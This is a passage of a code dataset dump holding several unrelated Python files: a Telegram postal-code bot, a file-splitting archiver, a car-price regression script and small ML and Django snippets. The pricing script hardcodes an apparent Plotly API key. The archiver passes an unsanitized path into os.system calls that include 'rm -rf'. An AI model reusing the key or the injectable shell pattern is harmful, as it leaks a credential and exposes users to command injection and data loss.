json.loads(config.read())\n token = str(config['token'])\n return token\n\n\n# Basic logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n# Interaction with Mongo Functions\n# TODO: Needs to be separated in the future\ndef construct_cities_list(cities_list, page_num):\n keyboard = []\n list_len = len(cities_list)\n buttons_per_page = 5\n if list_len <= buttons_per_page:\n for city in cities_list:\n keyboard.append([InlineKeyboardButton(str(city), callback_data=str(city))])\n\n else:\n # compute first and last indexes\n last_index = page_num * buttons_per_page\n first_index = last_index - buttons_per_page\n\n # extract the cities for the page\n page_list = cities_list[first_index:last_index]\n\n # add cities\n for city in page_list:\n keyboard.append([InlineKeyboardButton(str(city), callback_data=str(city))])\n\n # add navigation footer\n navigation_footer = [InlineKeyboardButton(emojis.encode(\":arrow_left:\"), callback_data=\"city_list_back\"),\n InlineKeyboardButton(f\"{last_index}/{list_len}\", callback_data=\"do_nothing\"),\n InlineKeyboardButton(emojis.encode(\":arrow_right:\"), callback_data=\"city_list_forward\")]\n keyboard.append(navigation_footer)\n return keyboard\n\n# ==== Command Handlers ====\n# \"/start\" handler\ndef 
start_command(update, context):\n reply_markup = InlineKeyboardMarkup(construct_cities_list(mongo_receive_cities(), 1))\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_start,\n reply_markup=reply_markup)\n\n\n# \"/city\" handler\ndef city_command(update, context):\n reply_markup = InlineKeyboardMarkup(construct_cities_list(mongo_receive_cities(), 1))\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_available_cities,\n reply_markup=reply_markup)\n\n\n# inline query handler\n# By default chooses the city\n# Eventually I decided to use it more than once :)\ndef inline_query_handler(update, context):\n query = update.callback_query\n query.answer()\n global _cached_city_page\n global _cached_index_page\n global _cached_city\n total_pages = math.ceil(len(_cached_index_dict) / 10)\n addresses = list(_cached_index_dict.keys())\n indexes = list(_cached_index_dict.values())\n if str(query.data) == \"city_list_back\":\n if _cached_city_page <= 1:\n reply = text.txt_zero_page\n else:\n _cached_city_page -= 1\n reply = text.txt_available_cities\n reply_markup = InlineKeyboardMarkup(construct_cities_list(mongo_receive_cities(), _cached_city_page))\n query.edit_message_text(text=reply, reply_markup=reply_markup)\n\n elif str(query.data) == \"city_list_forward\":\n _cached_city_page += 1\n reply_markup = InlineKeyboardMarkup(construct_cities_list(mongo_receive_cities(), _cached_city_page))\n query.edit_message_text(text=text.txt_available_cities, reply_markup=reply_markup)\n\n elif str(query.data) == \"index_list_back\":\n print(\"Index Page: \" + str(_cached_index_page))\n print(\"Total Pages: \" + str(total_pages))\n if _cached_index_page > 1 :\n _cached_index_page = _cached_index_page - 1\n list_from = int(_cached_index_page) * 10 - 1\n list_until = list_from + 10\n addresses = addresses[list_from:list_until]\n indexes = indexes[list_from:list_until]\n\n reply_markup = construct_markup_index_list(_cached_index_page, total_pages)\n reply = construct_indexes_list(_cached_city, addresses, indexes)\n\n query.edit_message_text(text=reply, reply_markup=reply_markup, parse_mode=ParseMode.HTML)\n\n elif str(query.data) == \"index_list_forward\":\n print(\"Index Page: \" + str(_cached_index_page))\n print(\"Total Pages: \" + str(total_pages))\n if _cached_index_page <= total_pages - 1:\n _cached_index_page += 1\n list_from = int(_cached_index_page-1) * 10\n list_until = list_from + 10\n addresses = addresses[list_from:list_until]\n indexes = indexes[list_from:list_until]\n\n reply_markup = construct_markup_index_list(_cached_index_page, total_pages)\n reply = construct_indexes_list(_cached_city, addresses, indexes)\n query.edit_message_text(text=reply, reply_markup=reply_markup, parse_mode=ParseMode.HTML)\n\n elif str(query.data) == \"do_nothing\":\n pass\n\n elif str(query.data) in mongo_receive_cities():\n _cached_city = str(query.data)\n query.edit_message_text(text=text.txt_city_found)\n else:\n query.edit_message_text(text=text.txt_error)\n\n\ndef construct_indexes_list(_cached_city, addresses, indexes):\n reply = f'Город: {_cached_city}\\n'\n for x in range(0, len(addresses)):\n reply += f\"\\n{str(addresses[x])}: {str(indexes[x])}\"\n return reply\n\n\ndef construct_markup_index_list(_cached_index_page, total_pages):\n keyboard = [[InlineKeyboardButton(emojis.encode(\":arrow_left:\"), callback_data=\"index_list_back\"),\n InlineKeyboardButton(f\"{_cached_index_page}/{total_pages}\", callback_data=\"do_nothing\"),\n 
InlineKeyboardButton(emojis.encode(\":arrow_right:\"), callback_data=\"index_list_forward\")]]\n reply_markup = InlineKeyboardMarkup(keyboard)\n return reply_markup\n\n\n# text_handler\n# By default needs to search for index by user input\ndef index_command(update, context):\n user_input = str(update.message.text)\n global _cached_city\n global _cached_index_dict\n global _cached_index_page\n _cached_index_page = 1\n _cached_index_dict = mongo_get_index(user_input, _cached_city)\n total_pages = math.ceil(len(_cached_index_dict) / 10)\n addresses = list(_cached_index_dict.keys())\n indexes = list(_cached_index_dict.values())\n print(\"Index Page: \" + str(_cached_index_page))\n print(\"Total Pages: \" + str(total_pages))\n if len(addresses) <= 10:\n reply = text.txt_bingo + construct_indexes_list(_cached_city, addresses, indexes)\n context.bot.send_message(chat_id=update.effective_chat.id, text=reply, parse_mode=ParseMode.HTML)\n else:\n addresses = addresses[0:10]\n indexes = indexes[0:10]\n reply = construct_indexes_list(_cached_city, addresses, indexes)\n\n\n reply_markup = construct_markup_index_list(_cached_index_page, total_pages)\n\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_bingo)\n context.bot.send_message(chat_id=update.effective_chat.id, text=reply,\n parse_mode=ParseMode.HTML, reply_markup=reply_markup)\n\n# \"/help\" handler\n# Is a requirement of Telegram API\ndef help_command(update, context):\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_help,\n parse_mode=ParseMode.HTML)\n\n\n# \"/find_city \" handler\ndef find_city_command(update, context):\n cities = mongo_receive_cities()\n try:\n if not context.args:\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_no_input,\n parse_mode=ParseMode.HTML)\n\n else:\n _input = ''\n for word in context.args:\n _input += word\n reply_list = []\n for city in cities:\n if _input.upper() in city.upper():\n reply_list.append(city)\n if not reply_list:\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_no_reply,\n parse_mode=ParseMode.HTML)\n else:\n keyboard_reply = InlineKeyboardMarkup(construct_cities_list(reply_list, 1))\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_cities_received,\n reply_markup=keyboard_reply)\n except TypeError:\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_error)\n\n\n# Contains Command Handlers\ndef main():\n # Create updater\n updater = Updater(token=get_token(), use_context=True)\n dispatcher = updater.dispatcher\n # \"/start\" command\n start_handler = CommandHandler('start', start_command)\n dispatcher.add_handler(start_handler)\n # \"/city\" command\n choose_city_handler = CommandHandler('city', city_command)\n dispatcher.add_handler(choose_city_handler)\n # Here we receive the response from the inline query\n dispatcher.add_handler(CallbackQueryHandler(inline_query_handler))\n # \"/help\" command\n dispatcher.add_handler(CommandHandler('help', help_command))\n # How we handle each other text received\n text_handler = MessageHandler(Filters.text & (~Filters.command), index_command)\n dispatcher.add_handler(text_handler)\n # \"/find_city\" command\n dispatcher.add_handler(CommandHandler('find_city', find_city_command))\n\n updater.start_polling()\n\n updater.idle()\n\n\nif __name__ == \"__main__\":\n 
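# module entry point: build the dispatcher and start long polling\n 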
main()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":9750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589851170","text":"# __________ ___. .__ __\n# \\______ \\ ____ _____ ____ ____\\_ |__ | | _____ _______/ |_ ___________\n# | ___// __ \\\\__ \\ _/ ___\\/ __ \\| __ \\| | \\__ \\ / ___/\\ __\\/ __ \\_ __ \\\n# | | \\ ___/ / __ \\\\ \\__\\ ___/| \\_\\ \\ |__/ __ \\_\\___ \\ | | \\ ___/| | \\/\n# |____| \\___ >____ /\\___ >___ >___ /____(____ /____ > |__| \\___ >__|\n# \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/\n\n\n###########################################################################\n## ##\n## File Splitter ##\n## ##\n###########################################################################\n## ##\n## splits large sets of files into directories, compresses them ##\n## ##\n## USAGE: python3 fileSplitter.py -P /path/to/directory ##\n## ##\n###########################################################################\n\n#imports\nimport os\nimport subprocess\nimport math\nimport sys\nimport argparse\nimport time\n\n#get CLI arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-p\", \"--path\", help=\"full path to target directory\")\nparser.add_argument(\"-t\", \"--threads\", help=\"Number of threads to use\", type=int)\nparser.add_argument(\"-s\", \"--splits\", help=\"Number archives to split files into\", type=int)\nparser.add_argument(\"-S\", \"--splitsize\", help=\"Size of archives to create (GB)\", type=int)\nargs=parser.parse_args()\nif not args.path:\n help()\n print(\"main path not provided!\")\n quit()\nelse:\n mainPath=args.path\nif not args.threads:\n print(\"Defaulting to 4 threads\")\n threads=4\nelse:\n threads=args.threads\nif args.splitsize:\n splitsize=args.splitsize\n splits=None\nif args.splits:\n splits=args.splits\n splitsize=None\nif args.splits and args.splitsize:\n print('Cannot specify splitsize and number of splits, please choose one.')\n quit()\nif not args.splits and not args.splitsize:\n print('No split size or number of splits given. 
Defaulting to 2GB archives...')\n splitsize=2\ndef help():\n #print some helpful stuff\n print('USAGE: python3 fileSplitter.py -P /path/to/directory')\n\n#print initial info\nprint(\"Target directory: \", mainPath)\n\nclass fileSplitter:\n #########################\n # setup and validation: #\n #########################\n def __init__(self, splitNum=2, threads=4, mainPath=mainPath):\n if not self.validatePath(mainPath):\n raise ValueError(\"Path provided is invalid\")\n print(\"Path provided is invalid, quitting\")\n quit()\n self.files=os.listdir(mainPath)\n if not self.checkSubdirectories():\n raise ValueError(\"Path provided contains subdirectories\")\n print(\"Path provided contains subdirectories, quitting\")\n quit()\n self.fileCount=len(self.files)\n self.threads=threads\n #number of subdirectories to make for splitting files:\n self.splitNum=splitNum\n self.fileSplit=[]\n self.subDirExists=False\n self.numArchives=0\n self.fileSizes={}\n self.mainPath=mainPath\n def validatePath(self, mainPath):\n #ensures path is valid on host OS\n if os.path.exists(mainPath):\n return True\n def checkSubdirectories(self):\n #ensures there are no contained subdirectories\n for f in self.files:\n if os.path.isdir(f):\n return False\n return True\n #####################\n # useful functions: #\n #####################\n def makeFileLists_splits(self):\n #makes list of lists containing files partitioned into self.splitNum partitions\n #makes empty list object\n self.fileSplit=list(range(self.splitNum))\n for f in range(self.splitNum):\n self.fileSplit[f]=[]\n for i in range(len(self.files)):\n self.fileSplit[i % self.splitNum].append(self.files[i])\n #get number of archives for other methods:\n self.numArchives=self.splitNum\n\n def makeSubdirectories(self):\n #makes the empty subdirectories on the filesystem\n if not self.numArchives:\n raise RuntimeError(\"self.numArchives not created yet\")\n return 0\n #make containing directory for the deliverable:\n os.system(\"mkdir \"+self.mainPath+\"/DELIVERABLE\")\n for i in range(self.numArchives):\n try:\n os.system(\"mkdir \"+self.mainPath+\"/set\"+str(i))\n except:\n raise RuntimeError(\"Unable to create directory\")\n print(\"Unable to create directory 'set\"+str(i)+\"', quitting\")\n quit()\n self.subDirExists=True\n\n def moveFiles(self):\n #Does the actualy file moving\n #iterate through target subdirectories, parallelizing copy process within each one\n for i in range(self.numArchives):\n print(\"Starting copy for set \"+str(i+1)+\"/\"+str(self.splitNum+1))\n processes=set()\n for f in self.fileSplit[i]:\n print(f)\n #copypasta from stackexchange- idk for sure what this is doing\n processes.add(subprocess.Popen([\"cp\", self.mainPath+\"/\"+f, self.mainPath+\"/set\"+str(i)]))\n if len(processes) >= self.threads:\n os.wait()\n processes.difference_update([p for p in processes if p.poll() is not None])\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n #I'm VERY tired of the system ignoring os.wait(), doing this instead:\n print('waiting for child processes to complete...')\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n\n def makeFileLists_size(self):\n print('Getting file sizes...')\n #make a list of dicts with file name and size\n for filename in self.files:\n self.fileSizes[filename]=os.path.getsize(self.mainPath+'/'+filename)\n #the matching algorithm: it's ineligant, but given it's not yet moving anything, this should be ok:\n print('Sorting into optimal size archives...')\n 
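# greedy first-fit over the size-sorted list: keep a running byte total and\n # open a new archive whenever the next file would push it past the limit\n 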
currentItem=0\n currentItemSize=0\n self.fileSplit=[[]]\n self.fileSizes=sorted(self.fileSizes.items(), key = lambda kv: kv[1], reverse=True)\n # start with empty directory, loop through files. If adding file to current set would go over size, make a new one and start again, if not, add it.\n for i in range(len(self.fileSizes)):\n #see if new file would put partition over mandated size:\n if currentItemSize+self.fileSizes[i][1]>10**9*self.splitNum and currentItem == 0: #recall it was in GB\n #if it's the first one, make it standalone instead of making a new empty one:\n self.fileSplit=[[self.fileSizes[i][0]],[]]\n currentItem=currentItem+1\n currentItemSize=0\n elif currentItemSize+self.fileSizes[i][1]>10**9*self.splitNum:\n #if yes, then start a new one:\n print('Size at {}. Starting new archive...'.format(currentItemSize))\n currentItem=currentItem+1\n currentItemSize=0\n self.fileSplit.append([self.fileSizes[i][0]])\n currentItemSize=currentItemSize+self.fileSizes[i][1]\n else:\n #if not, add it and move on:\n self.fileSplit[currentItem].append(self.fileSizes[i][0])\n currentItemSize=currentItemSize+self.fileSizes[i][1]\n #get number of archives for other methods:\n self.numArchives=len(self.fileSplit)\n\n #compression methods:\n def compressFilesTar(self):\n #Does the actualy file moving\n #iterate through target subdirectories, parallelizing copy process within each one\n processes=set()\n for i in range(self.numArchives):\n print(\"Starting compression for set \"+str(i)+\"/\"+str(self.numArchives))\n #copypasta from stackexchange- idk for sure what this is doing\n processes.add(subprocess.Popen([\"tar\", \"-czvf\", self.mainPath+\"/DELIVERABLE/set\"+str(i)+\".tar.gz\", self.mainPath+\"/set\"+str(i)]))\n if len(processes) >= self.threads:\n os.wait()\n processes.difference_update([p for p in processes if p.poll() is not None])\n print('waiting for child processes to complete...')\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n def compressFilesZip(self):\n #Does the actualy file moving\n #iterate through target subdirectories, parallelizing copy process within each one\n processes=set()\n for i in range(self.numArchives):\n print(\"Starting compression for set \"+str(i)+\"/\"+str(self.numArchives))\n #copypasta from stackexchange- idk for sure what this is doing\n processes.add(subprocess.Popen([\"zip\", \"-r\", \"-j\", self.mainPath+\"/DELIVERABLE/set\"+str(i)+\".zip\", self.mainPath+\"/set\"+str(i)]))\n if len(processes) >= self.threads:\n os.wait()\n processes.difference_update([p for p in processes if p.poll() is not None])\n print('waiting for child processes to complete...')\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n def compressFilesRar(self):\n #Does the actualy file moving\n #iterate through target subdirectories, parallelizing copy process within each one\n processes=set()\n for i in range(self.numArchives):\n print(\"Starting compression for set \"+str(i)+\"/\"+str(self.numArchives))\n #copypasta from stackexchange- idk for sure what this is doing\n #\"q\" should suppress output so it isn't annoying like with the tarball method\n processes.add(subprocess.Popen([\"rar\", \"a\", self.mainPath+\"/DELIVERABLE/set\"+str(i)+\".rar\", self.mainPath+\"/set\"+str(i)]))\n if len(processes) >= self.threads:\n os.wait()\n processes.difference_update([p for p in processes if p.poll() is not None])\n print('waiting for child processes to complete...')\n for p in processes:\n p.communicate()\n p.wait()\n 
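# same echo no-op used in moveFiles to settle the shell after the waits\n 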
x=os.popen('echo \"\"').read()\n #ending tasks:\n def makeManifest(self):\n #make manifests for each archive\n for i in range(self.numArchives):\n print(\"Creating manifest for set\"+str(i))\n filelink=open(self.mainPath+\"/DELIVERABLE/set\"+str(i)+\"_file_list.txt\",\"w+\")\n for f in self.fileSplit[i]:\n filelink.write(f+\"\\n\")\n filelink.close()\n def cleanSubDirectories(self):\n #remove all the subdirectories now that we have archives\n for i in range(self.numArchives):\n os.system(\"rm -rf \"+self.mainPath+\"/set\"+str(i))\n\n#used for development- ignore this\n#def makeTestCase(n):\n# for i in range(n):\n# os.system('echo \"hello\" >> '+str(i)+'.txt')\n#os.system(\"rm -rf \"+mainPath+\"/set*\")\n#os.system(\"rm -rf \"+mainPath+\"/DELIVERABLE\")\n#makeTestCase(40000)\n\n\n#instantiate object\nif splits:\n obj=fileSplitter(splitNum=splits, threads=threads)\nelse:\n obj=fileSplitter(threads=threads)\n#display some info\nprint(\"Found \"+str(obj.fileCount)+\" files.\")\nprompt=input(\"Proceed? (y/n) \")\nif prompt.lower()=='y':\n loop=True\n method=''\n while loop==True:\n prompt=input(\"Select compression method:\\n 1.) .tar.gz\\n 2.) .zip (requires 'zip' package- DO NOT USE WITHOUT)\\n 3.) .rar (requires 'rar' package- DO NOT USE WITHOUT)\\n 4.) quit\\n\")\n if prompt not in ['1','2','3','4']:\n print(\"invalid selection!\")\n else:\n method=prompt\n loop=False\n if method=='4':\n quit()\n if splitsize:\n obj.makeFileLists_size()\n obj.makeSubdirectories()\n else:\n obj.makeFileLists_splits()\n obj.makeSubdirectories()\n obj.moveFiles()\n obj.makeManifest()\n if method=='1':\n obj.compressFilesTar()\n if method=='2':\n obj.compressFilesZip()\n if method=='3':\n obj.compressFilesRar()\n obj.cleanSubDirectories()\nprint(\"complete!\")\n","sub_path":"fileSplitter.py","file_name":"fileSplitter.py","file_ext":"py","file_size_in_byte":12778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313032230","text":"import numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn import datasets, linear_model\r\nimport plotly\r\nimport plotly.plotly as py\r\nimport plotly.graph_objs as go\r\n\r\ndata = pd.read_csv(\"/home/valentin/GitHub/data/CrawlerFord.csv\")\r\n#data = pd.read_csv(\"Q:\\ProjetsInternes\\PricingVO\\donnees\\CrawlerCitroen.csv\",encoding=\"utf-8\")\r\n#data['mode'].unique()\r\n#len(data['version'].unique())\r\n\r\ndata = data.drop(data.columns[0], axis=1)\r\n\r\n####################\r\n## PLOTING ZONE ####\r\n####################\r\ndata\r\n\r\ndata_sub = data[data['mode']==\"FORD FIESTA 5\"]\r\nlen(data_sub)\r\ndata_sub\r\nplt.plot(data_sub.prix,data_sub.km,'ro')\r\nplt.show()\r\n\r\nplt.plot(data_sub['prix'],data_sub['annee'],'ro')\r\nplt.show()\r\n\r\nplotly.tools.set_credentials_file(username='valentin.lefranc', api_key='Xb0HU4LGnX8h3COhUgJr')\r\n\r\nlen(data_sub)\r\ndata_sub.columns\r\nmsk = np.random.rand(len(data_sub)) < 0.8\r\ndata_subtrain = data_sub[msk]\r\ndata_subtest = data_sub[~msk]\r\n\r\nlen(data_subtrain)\r\n############# Random RandomForest\r\nfeatures = data_subtrain.columns[[3,4,5,7]]\r\ny = data_subtrain['prix']\r\nclf = RandomForestRegressor(n_estimators=20)\r\nclf.fit(data_subtrain[features], y)\r\ny_test = data_subtest['prix']\r\n\r\ndata_subtest['prediction'] = 
clf.predict(data_subtest[features])\r\ndata_subtest['error'] = (data_subtest['prix'] - clf.predict(data_subtest[features]))/data_subtest['prix']\r\nhist = [go.Histogram(x=data_subtest['error'])]\r\npy.iplot(hist, filename='basic histogram')\r\n\r\n\r\nEmoy = np.sum( abs(data_subtest['error']) )/len(data_subtest.index)\r\nEmoy\r\n\r\n############# Regression linear\r\nfeatures = data_subtrain.columns[[3,4,5,7]]\r\ny = data_subtrain['prix']\r\nclf = linear_model.LinearRegression()\r\nclf.fit(data_subtrain[features], y)\r\ny_test = data_subtest['prix']\r\n\r\ndata_subtest['prediction'] = clf.predict(data_subtest[features])\r\ndata_subtest['error'] = (data_subtest['prix'] - clf.predict(data_subtest[features]))/data_subtest['prix']\r\nhist = [go.Histogram(x=data_subtest['error'])]\r\npy.iplot(hist, filename='basic histogram')\r\n\r\nEmoy = np.sum( abs(data_subtest['error']) )/len(data_subtest.index)\r\nEmoy\r\n\r\n\r\n## Mot clef pour les versions\r\nNver = np.array(data['version'])\r\nAllkeyw = Nver[1].split(\" \")\r\n\r\nfor i in range(0,len(Nver)):\r\n if i == 0:\r\n Allkeyw = Nver[i].split(\" \")\r\n if i > 0:\r\n Allkeyw = np.append(Allkeyw,Nver[i].split(\" \"))\r\n\r\n\r\n\r\nAllkeyw = pd.DataFrame(Allkeyw)\r\nAllkeyw.columns = np.array(['kw'])\r\nAllkeyw_S = Allkeyw.groupby(['kw']).apply(len)\r\nAllkeyw_S = pd.DataFrame(Allkeyw_S)\r\nAllkeyw_S.columns = np.array(['oc'])\r\nAllkeyw_S = Allkeyw_S.sort_values(by =['oc'], ascending=False)\r\n# On ne garde que les mots clefs qui apparaissent plus d'une fois sur 100\r\nAllkeyw_S = Allkeyw_S[Allkeyw_S['oc'] > 0.01*len(Allkeyw)]\r\nAllkeyw_S.index[2]\r\nlen(Allkeyw_S)\r\ndata['kw'] = 1\r\na = np.linspace(0,0,len(Allkeyw_S))\r\n\r\nfor j in range(0,len(Allkeyw_S)):\r\n for i in range(0,len(data['version'])):\r\n if np.array(data['version'])[i].find(Allkeyw_S.index[j]) == -1:\r\n b=1\r\n if np.array(data['version'])[i].find(Allkeyw_S.index[j]) != -1:\r\n a[j] = a[j] + np.array(data['version'])[i].find(Allkeyw_S.index[j])\r\n\r\n a[j] = a[j]/np.array(Allkeyw_S)[j]\r\n\r\n\r\nkwdf = pd.DataFrame(np.array(Allkeyw_S.index))\r\nkwdf['pos'] = a\r\nkwdf = kwdf.sort_values(by =['pos'], ascending=True)\r\nkwdf['type'] = \"Uk\"\r\nkwdf['type'][kwdf['pos']<1] = \"Nmod\"\r\nkwdf['type'][kwdf['pos']>3 ] = \"litre\"\r\nkwdf['type'][kwdf['pos']>5 ] = \"moteur\"\r\nkwdf['type'][kwdf['pos']>10] = \"PUI\"\r\nkwdf['type'][kwdf['pos']>17] = \"OPT\"\r\n\r\nkwdf\r\n\r\ndata['litre'] = 1\r\nlitre = kwdf[kwdf['type'] == \"litre\"]\r\nlitre.columns = np.array(['litre','pos','type'])\r\n\r\nfor j in range(0,len(litre)):\r\n print(np.array(litre['litre'])[j])\r\n for i in range(0,len(data['version'])):\r\n if np.array(data['version'])[i].find( np.array(litre['litre'])[j] ) != -1:\r\n data['litre'][data.index[i]] = np.array(litre['litre'])[j]\r\n\r\ndata['moteur'] = 'moteur'\r\nmoteur = kwdf[kwdf['type'] == \"moteur\"]\r\nmoteur.columns = np.array(['moteur','pos','type'])\r\nmoteur\r\n\r\nfor j in range(0,len(moteur)):\r\n print(np.array(moteur['moteur'])[j])\r\n for i in range(0,len(data['version'])):\r\n if np.array(data['version'])[i].find( np.array(moteur['moteur'])[j] ) != -1:\r\n data['moteur'][data.index[i]] = np.array(moteur['moteur'])[j]\r\n\r\ndata_f = data\r\ndata_f = data_f.replace({'E-HDI': 1}, regex=True)\r\ndata_f = data_f.replace({'BLUEHDI': 2}, regex=True)\r\ndata_f = data_f.replace({'PURETECH': 3}, regex=True)\r\ndata_f = data_f.replace({'moteur': 0}, regex=True)\r\n\r\ndata_f\r\nErrors = np.zeros(len(np.unique(data_f['mode'])))\r\nModelsC = 
np.unique(data_f['mode'])\r\n\r\ni =0\r\n\r\nfor modelC in np.unique(data_f['mode']):\r\n data_sub = data_f[data_f['mode']==modelC]\r\n if len(data_sub) > 99:\r\n msk = np.random.rand(len(data_sub)) < 0.8\r\n data_subtrain = data_sub[msk]\r\n data_subtest = data_sub[~msk]\r\n\r\n ############# Random RandomForest\r\n features = data_subtrain.columns[[3,4,5,7,9,10]]\r\n y = data_subtrain['prix']\r\n clf = RandomForestRegressor(n_estimators=20)\r\n clf.fit(data_subtrain[features], y)\r\n y_test = data_subtest['prix']\r\n\r\n data_subtest['prediction'] = clf.predict(data_subtest[features])\r\n data_subtest['error'] = (data_subtest['prix'] - clf.predict(data_subtest[features]))/data_subtest['prix']\r\n #hist = [go.Histogram(x=data_subtest['error'])]\r\n #py.iplot(hist, filename='basic histogram')\r\n\r\n Emoy = np.sum( abs(data_subtest['error']) )/len(data_subtest.index)\r\n Errors[i] = Emoy\r\n i = i+1\r\n print(\"model : \" + str(modelC) + \" size: \" + str(len(data_sub)) + \" Erreur moy: \" + str(Emoy))\r\n\r\n\r\nErrors = Errors[Errors>0]\r\nnp.mean(Errors)\r\n","sub_path":"PricingFord.py","file_name":"PricingFord.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42049811","text":"def indent(line):\n count = 0\n for char in line:\n if char == ' ':\n count += 1\n else:\n break\n return count\n\n\n\ndef eval_turtle(program):\n\n def return_to_stack():\n if stack[-1]['count'] != 0:\n index = stack[-1]['index']\n stack[-1]['count'] -= 1\n else:\n del stack[-1]\n return_to_stack()\n\n x, y = 0, 0\n painted = set()\n stack = []\n\n index = 0\n while True:\n if index != 0 and indent(program[index]) < indent(program[index-1]):\n return_to_stack()\n continue\n\n command = program[index].split()\n\n if len(command) == 1:\n command = command[0]\n if command == 'left':\n x -= 1\n elif command == 'right':\n x += 1\n elif command == 'down':\n y -= 1\n elif command == 'up':\n y += 1\n elif command == 'paint':\n painted.add((x, y))\n else:\n if command[0] == 'loop':\n stack.append({'index': index + 1, 'count': int(command[1])})\n\n","sub_path":"ДЗ ФКН/turtle/turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533807540","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n\n@receiver(post_save, sender=User)\ndef create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n@receiver(post_save, sender=User)\ndef save_user_profile(sender, instance, **kwargs):\n instance.profile.save()\n\nclass Room(models.Model):\n room_id = models.AutoField(primary_key= True)\n room_name = models.CharField(max_length= 40)\n room_description = models.CharField(max_length= 200)\n # room_type=models.CharField(max_length=40)\n # room_design=models.CharField(max_length=100)\n user = models.ForeignKey(Profile, on_delete= models.CASCADE)","sub_path":"roombooking/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"629598038","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.models import Model, load_model\nfrom 
tensorflow.keras import preprocessing\n\nclass NerModel:\n def __init__(self, model_name1, proprocess):\n self.index_to_ner ={1:'0',2:'B_DT',3:'B_FOOD',4:'I',5:'B_OG',6:'B_PS',7:'B_LC',8:'NNp', 9:'B_TI', 0:'PAD'}\n\n self.model = tf.keras.models.load_model(model_name1)\n self.p = proprocess\n def predict(self, query):\n pos = self.p.pos(query)\n keywords = self.p.get_keywords(pos, without_tag=True)\n sequences = [self.p.get_wordidx_sequence(keywords)]\n\n max_len = 40\n padded_seqs = preprocessing.sequence.pad_sequences(sequences, padding = 'post', value = 0, maxlen = max_len)\n\n predict = self.model.predict(np.array([padded_seqs[0]]))\n predict_class = tf.math.argmax(predict, axis = -1)\n \n tags = [self.index_to_ner[i] for i in predict_class.numpy()[0]]\n return list(zip(keywords, tags))\n\n def predict_tags(self, query):\n pos = self.p.pos(query)\n keywords = self.p.get_keywords(pos, without_tag = True)\n sequences = [self.p.get_wordidx_sequence(keywords)]\n\n max_len = 40\n padded_seqs = preprocessing.sequence.pad_sequences(sequences, padding = 'post', value = 0, maxlen = max_len)\n\n predict = self.model.predict(np.array([padded_seqs[0]]))\n predict_class = tf.math.argmax(predict, axis = -1)\n tags = []\n\n for tag_idx in predict_class.numpy()[0]:\n if tag_idx == 1: continue\n tags.append(self.index_to_ner[tag_idx])\n if len(tags) == 0:\n return None\n return tags","sub_path":"data_visualization/deeplearning/chatbot/test/NerModel.py","file_name":"NerModel.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"11597239","text":"#!/usr/bin/env python\n#\n# Identify and draw our lane and expected path of travel.\n# Identify and frame nearby vehicles.\n\nfrom moviepy.editor import VideoFileClip\n\nfrom zone import LaneBoundaryZone, VehicleCollisionZone\n\nimport lesson_functions\n\ndef lane_car_locate_pipeline(vehicle_zone, lane_zone):\n \"\"\"Return a function that takes an image and runs the pipeline identifying lane boundaries and nearby cars.\"\"\"\n def _lane_car_locate_pipeline(rgb_img):\n \"\"\"Run both vehicle_zone and lane_zone pipelines.\"\"\"\n car_matches = vehicle_zone.locate_nearby_cars(rgb_img)\n lane_img = lane_zone.locate_lane_bounds(rgb_img)\n return lesson_functions.draw_boxes(lane_img, car_matches)\n return _lane_car_locate_pipeline\n\ndef main():\n \"\"\"Start here...\"\"\"\n # Create a frane iterator of the project video to run our pipeline on each frame.\n project_video = VideoFileClip('./project_video.mp4')\n\n # Determine dimensions of the video.\n sample_img_shape = project_video.get_frame(0).shape\n\n # Create the pipeline function.\n vehicle_zone = VehicleCollisionZone()\n lane_zone = LaneBoundaryZone(sample_img_shape[0], sample_img_shape[1])\n pipeline_fn = lane_car_locate_pipeline(vehicle_zone, lane_zone)\n\n # Pass the pipeline function to the iterator and fire it up saving the resulting stream to a video file.\n project_video_pipeline = project_video.fl_image(pipeline_fn)\n project_video_pipeline.write_videofile('./output_videos/project_video_pipeline.mp4', audio=False)\n\nif __name__ == '__main__':\n 